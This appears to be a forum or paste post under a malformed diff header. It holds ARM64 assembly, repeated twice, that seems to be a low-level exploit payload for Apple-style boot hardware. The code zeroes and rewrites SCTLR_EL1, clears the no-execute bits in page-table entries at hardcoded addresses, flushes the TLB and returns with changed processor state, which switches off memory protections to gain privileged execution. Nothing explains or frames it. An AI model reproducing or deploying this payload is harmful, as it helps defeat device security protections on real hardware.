exploit3dguy · July 18, 2023 06:45
diff --git a/internationalhackingsolutionsfbi.s b/internationalhackingsolutionsfbi.s
 .text

 .pool

 .set ARM_TTE_BLOCK_PNX, 0x0020000000000000
 .set ARM_TTE_BLOCK_NX, 0x0040000000000000
 .set SDRAM_PAGE1, 0x180082000
 .set SRAM_PAGE1, 0x1800841F0

 .global _main



 _main:
 MOV X5, X30
 LDR X0, =0x800000000
 BL _cache_clean_and_invalidate_page
 MOV X0, #0
 SVC #0
 IC IALLU




 mrs x4, sctlr_el1
 mov x0, #0
 msr sctlr_el1, x0

 LDR X0, =SRAM_PAGE1
 LDR X0, [X0]
 and x0, x0, #0xffffffffffffff7f
 LDR X1, =SRAM_PAGE1
 STR X0, [X1]

 LDR X0, =SDRAM_PAGE1
 LDR X0, [X0]
 BIC X0, X0, (ARM_TTE_BLOCK_PNX | ARM_TTE_BLOCK_NX)
 LDR X1, =SDRAM_PAGE1
 STR X0, [X1]

 mov x0, x4
 BIC X0, X0, #0x80000
 msr sctlr_el1, x0



 DSB SY
 TLBI VMALLE1
 DSB SY
 ISB


 MRS X0, SPSR_EL1
 AND X0, X0, #0xFFFFFFFFFFFFFFF3
 MSR SPSR_EL1, X0
 MOV X0, X5
 MSR ELR_EL1, X0
 ERET


 _cache_clean_and_invalidate_page:
 mov x1, #0x80000
 mov x2, #0

 _one:
 cmp x1, x2
 b.eq _two
 dc civac, x0
 add x0, x0, #0x40
 add x2, x2, #0x40
 b _one



 _two:
 RET
	.text

	.pool

	.set ARM_TTE_BLOCK_PNX, 0x0020000000000000
	.set ARM_TTE_BLOCK_NX, 0x0040000000000000
	.set SDRAM_PAGE1, 0x180082000
	.set SRAM_PAGE1, 0x1800841F0

	.global _main



	_main:
	MOV X5, X30
	LDR X0, =0x800000000
	BL _cache_clean_and_invalidate_page
	MOV X0, #0
	SVC #0
	IC IALLU




	mrs x4, sctlr_el1
	mov x0, #0
	msr sctlr_el1, x0

	LDR X0, =SRAM_PAGE1
	LDR X0, [X0]
	and x0, x0, #0xffffffffffffff7f
	LDR X1, =SRAM_PAGE1
	STR X0, [X1]

	LDR X0, =SDRAM_PAGE1
	LDR X0, [X0]
	BIC X0, X0, (ARM_TTE_BLOCK_PNX \| ARM_TTE_BLOCK_NX)
	LDR X1, =SDRAM_PAGE1
	STR X0, [X1]

	mov x0, x4
	BIC X0, X0, #0x80000
	msr sctlr_el1, x0



	DSB SY
	TLBI VMALLE1
	DSB SY
	ISB


	MRS X0, SPSR_EL1
	AND X0, X0, #0xFFFFFFFFFFFFFFF3
	MSR SPSR_EL1, X0
	MOV X0, X5
	MSR ELR_EL1, X0
	ERET


	_cache_clean_and_invalidate_page:
	mov x1, #0x80000
	mov x2, #0

	_one:
	cmp x1, x2
	b.eq _two
	dc civac, x0
	add x0, x0, #0x40
	add x2, x2, #0x40
	b _one



	_two:
	RET